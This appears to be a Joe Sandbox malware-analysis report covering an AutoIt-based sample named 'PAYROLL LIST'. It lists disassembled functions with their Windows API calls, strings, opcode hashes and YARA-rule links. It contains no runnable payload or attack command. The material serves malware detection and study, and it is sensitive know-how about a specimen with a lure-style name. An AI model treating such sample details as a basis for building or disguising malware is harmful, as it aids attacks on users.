Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 65c16b26a2afb0a2fbfab8e08127105d8fd9cc65bac0a9776e70719616585a0d
Instruction ID: 879bf65ab2527e0fe9ee5b28065f455dd4d942f45a57d7211688d1dae9a0443a
Opcode Fuzzy Hash: 65c16b26a2afb0a2fbfab8e08127105d8fd9cc65bac0a9776e70719616585a0d
Instruction Fuzzy Hash: CEE04FB1510205EFDB009FB0D84866D7BB4EB4C350F12C80AFC9B87690CB7498428B50

Function 00A5B2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A5B2DF
UnloadUserProfile.USERENV(?,?), ref: 00A5B2EB
CloseHandle.KERNEL32(?), ref: 00A5B2F4
CloseHandle.KERNEL32(?), ref: 00A5B2FC

Part of subcall function 00A5AB24: GetProcessHeap.KERNEL32(00000000,?,00A5A848), ref: 00A5AB2B
Part of subcall function 00A5AB24: HeapFree.KERNEL32(00000000), ref: 00A5AB32

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 249b3d02c7443a693e13871500d73f31ce4ce69e1bef9e8c7531e79aa73b8c64
Instruction ID: 23b8c1dafdbf5f11e38ccccd2f26769dd0190ad12ef0cabe60006d49f348b4e5
Opcode Fuzzy Hash: 249b3d02c7443a693e13871500d73f31ce4ce69e1bef9e8c7531e79aa73b8c64
Instruction Fuzzy Hash: A3E0E63A104006BFCF016FD5DC08859FF76FF993213108221F656819B1CB329872EB91

Function 00A9B2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00A9B2AE
GetDC.USER32(00000000), ref: 00A9B2B8
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A9B2C3
ReleaseDC.USER32 ref: 00A9B2E2

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 371d94b560213ec1a64a1ab2cd38766b6ad79dc87cfc1f7f4fb5d5dc6bf052b3
Instruction ID: a2e9b13a7c691905d78db9e37540ade8ac8649cc3447ecd011583baa2104c31c
Opcode Fuzzy Hash: 371d94b560213ec1a64a1ab2cd38766b6ad79dc87cfc1f7f4fb5d5dc6bf052b3
Instruction Fuzzy Hash: B1E046B1500201EFDB009FB0D84862DBBA8EB4D350F12C80AF99B8B690CB7898028B00

Function 00A5DCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00A5DEAA

Strings

Container, xrefs: 00A5DE29
AutoIt3GUI, xrefs: 00A5DE22

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 18fd183580df6d45b18d46d12814761f7f51a7d3bb0274c4b3c51e852ae739f8
Instruction ID: 14c31cec839de7b8c186fe8f425a34956510ea62dd3edf4f038494b9c6a45cf2
Opcode Fuzzy Hash: 18fd183580df6d45b18d46d12814761f7f51a7d3bb0274c4b3c51e852ae739f8
Instruction Fuzzy Hash: 22913770600601AFDB24DF64C885B6ABBB5BF49711F10896EFC4ACB691DB70E845CB60

Function 00A6DE7C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00A3C6F4: _wcscpy.LIBCMT ref: 00A3C717

Part of subcall function 00A2936C: __swprintf.LIBCMT ref: 00A293AB
Part of subcall function 00A2936C: __itow.LIBCMT ref: 00A293DF

__wcsnicmp.LIBCMT ref: 00A6DEFD
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00A6DFC6

Strings

LPT, xrefs: 00A6DEF7

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 53dec2380308d094994f6d297257f71631aa267bf5afcb0f6f3b629a677fe711
Instruction ID: 57f2f5ff2c1d279b8dd520286e59320897da5221d98c6ef1e52612c25908167d
Opcode Fuzzy Hash: 53dec2380308d094994f6d297257f71631aa267bf5afcb0f6f3b629a677fe711
Instruction Fuzzy Hash: 10618E75E00215EFCB14DF98C995EAEB7F5AF08710F11406AF546AB291DB70AE40CB94

Function 00A3BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00A3BCDA
GlobalMemoryStatusEx.KERNEL32 ref: 00A3BCF3

Strings

@, xrefs: 00A3BCE8

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: c5407c966e494f265546e348f7dd021429f01be15e3b7b0840a44c4819c205d2
Instruction ID: 3bef760e0f0f6a9e0512e13466bc542fb2a7dd4fd2153ab392488c9f3dde3967
Opcode Fuzzy Hash: c5407c966e494f265546e348f7dd021429f01be15e3b7b0840a44c4819c205d2
Instruction Fuzzy Hash: 9E5133714087449BE320AF54EC86BAFBBECFF95354F41484EF1C9410A6EB7089A9C752

Function 00A6C56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00A244ED: __fread_nolock.LIBCMT ref: 00A2450B

_wcscmp.LIBCMT ref: 00A6C65D
_wcscmp.LIBCMT ref: 00A6C670

Strings

FILE, xrefs: 00A6C5A5

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: cad9de002674387f75fc27514ae725a258dec02f6a02fa65b4f4cec3721bb422
Instruction ID: 362afca39389e09642766129b8167484890fc83c896805344c030f5c0a21fdf1
Opcode Fuzzy Hash: cad9de002674387f75fc27514ae725a258dec02f6a02fa65b4f4cec3721bb422
Instruction Fuzzy Hash: 1641D376A0021ABBDF20ABA4DD42FEF77B9EF49714F000479F605EB181D670AA048B65

Function 00A8A76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00A8A85A
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A8A86F

Strings

', xrefs: 00A8A7C3

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: a44852b1743cebed43093cc8ffd60aa341a0a41c91eab082ec0d96f6e517d6b0
Instruction ID: 32fc47dff1c69afd600499a9e20225158828c9da22c39ba31095fb00909c01c8
Opcode Fuzzy Hash: a44852b1743cebed43093cc8ffd60aa341a0a41c91eab082ec0d96f6e517d6b0
Instruction Fuzzy Hash: C641F974E013099FEB14DFA8D981BDA7BB9FB18300F14006AE905EB341D770A942DFA1

Function 00A75180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A75190
InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00A751C6

Strings

|, xrefs: 00A751B5

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 815490a47ba42da62d89cce849df4cb8aebb1f6e1c88d475b056e833f9df2a99
Instruction ID: 45ef83b17d2665fdc7d1c3b264d6d071c2cf4c59744d9b41764f9ba039b8d91e
Opcode Fuzzy Hash: 815490a47ba42da62d89cce849df4cb8aebb1f6e1c88d475b056e833f9df2a99
Instruction Fuzzy Hash: 01313971C00119EBCF11EFA4DD85AEE7FB9FF14710F004025F905A6166EB71A906DBA0

Function 00A8975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00A8980E
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00A8984A

Strings

static, xrefs: 00A897AA

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 73537b5da8693efb1b3c1fe9ae42d0692006741a2af65c92916f02d6d915c0f3
Instruction ID: 4de329a7e505b3159fb28e850ac2186b3f99c0aff2560c73747af6f73505a2b7
Opcode Fuzzy Hash: 73537b5da8693efb1b3c1fe9ae42d0692006741a2af65c92916f02d6d915c0f3
Instruction Fuzzy Hash: A7316B71110605AEEB10EF64DC80BFB73A9FF99760F048619F8A9C7190DB31AC82DB60

Function 00A65157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A651C6
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00A65201

Strings

0, xrefs: 00A651BF

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 5aa5e8aa107f393067c2f30e18f4e24794eb74f120f6915d3da3ab20a0358c1c
Instruction ID: bfaa4d3d9b8523c99f9a2a6dc2d1bbb931ae29d4281fa1315e06f18e129c9fc6
Opcode Fuzzy Hash: 5aa5e8aa107f393067c2f30e18f4e24794eb74f120f6915d3da3ab20a0358c1c
Instruction Fuzzy Hash: C331B471E007059FEB24CFB9D995BEEBBF4FF45350F144019EA85A61A0E7709A44CB10

Function 00A7658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00A76608

Strings

, $, xrefs: 00A76648
AUTOITCALLVARIABLE%d, xrefs: 00A765FA

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: __snwprintf
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 2391506597-2584243854
Opcode ID: 4eff2cba05d85d98cb8b82e7bb79ce17c9016237156b0ab03a6ca35200dfed9d
Instruction ID: 2bf2933c65513da1a97a8015b6dec0de2a8e0de68ffb1936071fb1ac7f19feee
Opcode Fuzzy Hash: 4eff2cba05d85d98cb8b82e7bb79ce17c9016237156b0ab03a6ca35200dfed9d
Instruction Fuzzy Hash: 7C214C71A00628AACF14EF68DD82BED77B5BB59700F408469F405AB181DB70EA55CBA1

Function 00A893CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A8945C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A89467

Strings

Combobox, xrefs: 00A89429

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 65f89ff5f15346515eedb1b6b61b020847bd179441dd511e4d41ebf4692cbfa1
Instruction ID: 70d00c1ba4e968ffd290961ffb7302d4574c417df5f1ca1d1dec32b85ecea851
Opcode Fuzzy Hash: 65f89ff5f15346515eedb1b6b61b020847bd179441dd511e4d41ebf4692cbfa1
Instruction Fuzzy Hash: 53118271310209BFEF11EF54DC80EBB376EEB883A4F144129F9599B2A0D6719C528760

Function 00A898FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00A3D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A3D1BA
Part of subcall function 00A3D17C: GetStockObject.GDI32(00000011), ref: 00A3D1CE
Part of subcall function 00A3D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A3D1D8

GetWindowRect.USER32(00000000,?), ref: 00A89968
GetSysColor.USER32(00000012), ref: 00A89982

Strings

static, xrefs: 00A89945

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: a75efafef488722cbbca16e2e11b5b5f39e7740690ac91973ad723a7ec14bb6d
Instruction ID: 3e630d169710de46c4f032a5b686c0b5bf168bd2cfd5dff0812b3c27c92546c2
Opcode Fuzzy Hash: a75efafef488722cbbca16e2e11b5b5f39e7740690ac91973ad723a7ec14bb6d
Instruction Fuzzy Hash: F911297252020AAFDB04EFB8CC45AFA7BA8FB08344F054619F956E2250E734E851DB50

Function 00A89617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00A89699
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00A896A8

Strings

edit, xrefs: 00A8967D

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: b4901e28d0ebbaef859815a6bc8b00eb0b8d63d10d027a0c73f6771325964b14
Instruction ID: df2a7940149ec6a8c35c4f83aa64578be102f9096b4c32638c744197e48c6832
Opcode Fuzzy Hash: b4901e28d0ebbaef859815a6bc8b00eb0b8d63d10d027a0c73f6771325964b14
Instruction Fuzzy Hash: 3D116671500209ABEF11AFA4DC80AFB3B6EEB053B8F184724F965971E0E7359C51AB60

Function 00A65262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A652D5
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00A652F4

Strings

0, xrefs: 00A652CE

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 6e90c4d769121ed6c8b1dbd1213296a412af4a3dad81acb3cfa484f084b665e1
Instruction ID: 60e47f147299bfdd61ed21ab2d70a5473643692b0f500b7135fa5488cd63a04a
Opcode Fuzzy Hash: 6e90c4d769121ed6c8b1dbd1213296a412af4a3dad81acb3cfa484f084b665e1
Instruction Fuzzy Hash: 9D11E276D01624ABDB20DFB8D964FDD77F8AB05B54F040025E951EB290D3B0ED45CB90

Function 00A74D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00A74DF5
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00A74E1E

Strings

<local>, xrefs: 00A74DE6

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 1e1501936915283c614e350200af61ee24d9099139aae87565c370be86b271f1
Instruction ID: a7fa81267ce4659bd9a8917b65f137e9c7e7938fd970e7fae8e6997e065722e9
Opcode Fuzzy Hash: 1e1501936915283c614e350200af61ee24d9099139aae87565c370be86b271f1
Instruction Fuzzy Hash: D111A070501221BBDB358F51CC88FFBFAA8FF0A764F10C22AF59956140D3705941C6E0

Function 00A7A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON

Download Yara Rule

APIs

inet_addr.WSOCK32(00000000), ref: 00A7A84E
htons.WSOCK32(00000000), ref: 00A7A88B

Strings

255.255.255.255, xrefs: 00A7A866

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: htonsinet_addr
String ID: 255.255.255.255
API String ID: 3832099526-2422070025
Opcode ID: 3f3eddbb52ed22142a250a74885782326161933859b1550461d6e46df34234d9
Instruction ID: f839914a8975f985b9b1dba6ebe39b88cb613ca751b54c24d3412111200fe2fd
Opcode Fuzzy Hash: 3f3eddbb52ed22142a250a74885782326161933859b1550461d6e46df34234d9
Instruction Fuzzy Hash: 2401C075200305BBCB10AFA8DC86BADB364EF95724F10C426F51A9B2D1D771E8068752

Function 00A5B781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00A5B7EF

Strings

ComboBox, xrefs: 00A5B78B
ListBox, xrefs: 00A5B7B9

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
